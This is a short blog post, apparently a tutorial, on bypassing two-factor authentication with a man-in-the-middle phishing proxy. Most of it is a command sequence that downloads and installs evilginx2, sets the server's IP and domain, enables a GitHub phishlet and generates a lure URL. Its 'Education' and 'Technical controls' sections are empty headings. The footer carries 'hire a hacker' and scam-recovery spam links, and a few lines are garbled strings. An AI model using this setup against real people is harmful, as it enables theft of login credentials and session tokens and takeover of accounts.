Phishing 101: Bypassing 2FA like a pro

0 WAnUhxdzL 4H bam
Typical flow of a phishing attack using a Man In The Middle

Setup Requirements

  • A machine to run the tool. Any machine that can have ports 80, 443 and UDP 53 open and exposed to the internet can do. We will use an EC2 instance on AWS, but other cloud providers or on prem servers should do as well.
  • A domain name, and the ability to create subdomains.
  • The tool itself, which is already provided as a binary file.

Installation and Configuration

systemctl disable systemd-resolved
systemctl stop systemd-resolved
rm /etc/resolv.conf
echo 'nameserver 8.8.8.8' > /etc/resolv.conf
wget https://github.com/kgretzky/evilginx2/releases/download/2.4.0/evilginx-linux-amd64.tar.gz
tar zxvf evilginx-linux-amd64.tar.gz
cd evilginx
chmod 700 ./install.sh
sudo ./install.sh
sudo evilginx
config ip <your_public_ip>
config domain <your_domain>
1 QeGR0dXs kTm yc7T21IHQ
1 3KpuPmPOpPyIUVyE49DEhw
phishlets hostname github <your_domain>
phishlets enable github 
lures create github
lures edit 0 redirect_url https://github.com
lures get-url 0

Education

Technical controls

administrator

Leave a Reply

Your email address will not be published. Required fields are marked *

fb logo
recover dogecoin from a scam
recover ethereum from a scammer
hire a hacker to hack iphone
hire a hacker to hack snapchat
hire a hacker to hack a windows computer
error: Content is protected !!